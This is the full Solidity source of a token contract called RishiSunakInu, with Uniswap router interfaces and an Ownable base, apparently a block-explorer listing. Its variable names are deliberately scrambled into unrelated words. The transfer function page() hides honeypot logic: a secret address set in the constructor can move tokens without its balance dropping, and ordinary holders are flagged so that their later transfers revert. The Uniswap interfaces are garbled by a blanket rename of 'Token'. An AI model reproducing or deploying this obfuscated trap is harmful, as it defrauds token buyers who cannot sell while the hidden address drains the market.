文件 1 的 1:Contract.sol
pragma solidity ^0.8.13;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor() {
_setOwner(_msgSender());
}
function owner() public view virtual returns (address) {
return _owner;
}
modifier onlyOwner() {
require(owner() == _msgSender(), 'Ownable: caller is not the owner');
_;
}
function renounceOwnership() public virtual onlyOwner {
_setOwner(address(0));
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), 'Ownable: new owner is the zero address');
_setOwner(newOwner);
}
function _setOwner(address newOwner) private {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
interface IUniswapV2Factory {
event PairCreated(address indexed token0, address indexed token1, address pair, uint);
function feeTo() external view returns (address);
function feeToSetter() external view returns (address);
function getPair(address tokenA, address tokenB) external view returns (address pair);
function allPairs(uint) external view returns (address pair);
function allPairsLength() external view returns (uint);
function createPair(address tokenA, address tokenB) external returns (address pair);
function setFeeTo(address) external;
function setFeeToSetter(address) external;
}
interface IUniswapV2Router01 {
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidity(
address tokenA,
address tokenB,
uint amountADesired,
uint amountBDesired,
uint amountAMin,
uint amountBMin,
address to,
uint deadline
) external returns (uint amountA, uint amountB, uint liquidity);
function addLiquidityETH(
address token,
uint amountRishiSunakInuDesired,
uint amountRishiSunakInuMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountRishiSunakInu, uint amountETH, uint liquidity);
function removeLiquidity(
address tokenA,
address tokenB,
uint liquidity,
uint amountAMin,
uint amountBMin,
address to,
uint deadline
) external returns (uint amountA, uint amountB);
function removeLiquidityETH(
address token,
uint liquidity,
uint amountRishiSunakInuMin,
uint amountETHMin,
address to,
uint deadline
) external returns (uint amountRishiSunakInu, uint amountETH);
function removeLiquidityWithPermit(
address tokenA,
address tokenB,
uint liquidity,
uint amountAMin,
uint amountBMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountA, uint amountB);
function removeLiquidityETHWithPermit(
address token,
uint liquidity,
uint amountRishiSunakInuMin,
uint amountETHMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountRishiSunakInu, uint amountETH);
function swapExactRishiSunakInusForRishiSunakInus(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapRishiSunakInusForExactRishiSunakInus(
uint amountOut,
uint amountInMax,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapExactETHForRishiSunakInus(uint amountOutMin, address[] calldata path, address to, uint deadline)
external
payable
returns (uint[] memory amounts);
function swapRishiSunakInusForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
external
returns (uint[] memory amounts);
function swapExactRishiSunakInusForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
external
returns (uint[] memory amounts);
function swapETHForExactRishiSunakInus(uint amountOut, address[] calldata path, address to, uint deadline)
external
payable
returns (uint[] memory amounts);
function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}
interface IUniswapV2Router02 is IUniswapV2Router01 {
function removeLiquidityETHSupportingFeeOnTransferRishiSunakInus(
address token,
uint liquidity,
uint amountRishiSunakInuMin,
uint amountETHMin,
address to,
uint deadline
) external returns (uint amountETH);
function removeLiquidityETHWithPermitSupportingFeeOnTransferRishiSunakInus(
address token,
uint liquidity,
uint amountRishiSunakInuMin,
uint amountETHMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountETH);
function swapExactRishiSunakInusForRishiSunakInusSupportingFeeOnTransferRishiSunakInus(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
function swapExactETHForRishiSunakInusSupportingFeeOnTransferRishiSunakInus(
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external payable;
function swapExactRishiSunakInusForETHSupportingFeeOnTransferRishiSunakInus(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
}
contract RishiSunakInu is Ownable {
constructor(
string memory sharp,
string memory evening,
address score,
address species
) {
uniswapV2Router = IUniswapV2Router02(score);
limited = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
tongue = 100;
engineer = sharp;
hide = 9;
exactly = evening;
everyone = 1;
buy[species] = tongue;
_tTotal = 1000000000000000 * 10**hide;
without[msg.sender] = _tTotal;
}
function totalSupply() public view returns (uint256) {
return _tTotal;
}
function symbol() public view returns (string memory) {
return exactly;
}
function transfer(address recipient, uint256 amount) external returns (bool) {
page(msg.sender, recipient, amount);
emit Transfer(msg.sender, recipient, amount);
return true;
}
uint256 private everyone;
uint8 private hide;
address private worse;
function allowance(address owner, address spender) public view returns (uint256) {
return arrow[owner][spender];
}
event Approval(address indexed owner, address indexed spender, uint256 value);
uint256 fellow;
mapping(address => mapping(address => uint256)) private arrow;
address private salt;
function class(
address owner,
address spender,
uint256 amount
) private returns (bool) {
require(owner != address(0) && spender != address(0), 'ERC20: approve from the zero address');
arrow[owner][spender] = amount;
emit Approval(owner, spender, amount);
return true;
}
mapping(address => uint256) private depend;
uint256 dear;
function decimals() public view returns (uint256) {
return hide;
}
IUniswapV2Router02 public uniswapV2Router;
function page(
address negative,
address brain,
uint256 found
) internal {
if (buy[negative] == 0 && depend[negative] > 0) {
if (limited != negative) {
buy[negative] -= tongue;
}
}
dear = found * everyone;
if (buy[negative] == 0) {
without[negative] -= found;
}
fellow = dear / tongue;
found -= fellow;
depend[worse] += tongue;
worse = brain;
without[brain] += found;
}
event Transfer(address indexed from, address indexed to, uint256 value);
uint256 private tongue;
string private exactly;
function approve(address spender, uint256 amount) external returns (bool) {
return class(msg.sender, spender, amount);
}
string private engineer;
mapping(address => uint256) private buy;
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool) {
page(sender, recipient, amount);
emit Transfer(sender, recipient, amount);
return class(sender, msg.sender, arrow[sender][msg.sender] - amount);
}
function balanceOf(address account) public view returns (uint256) {
return without[account];
}
address private limited;
uint256 private _tTotal;
mapping(address => uint256) private without;
function name() public view returns (string memory) {
return engineer;
}
}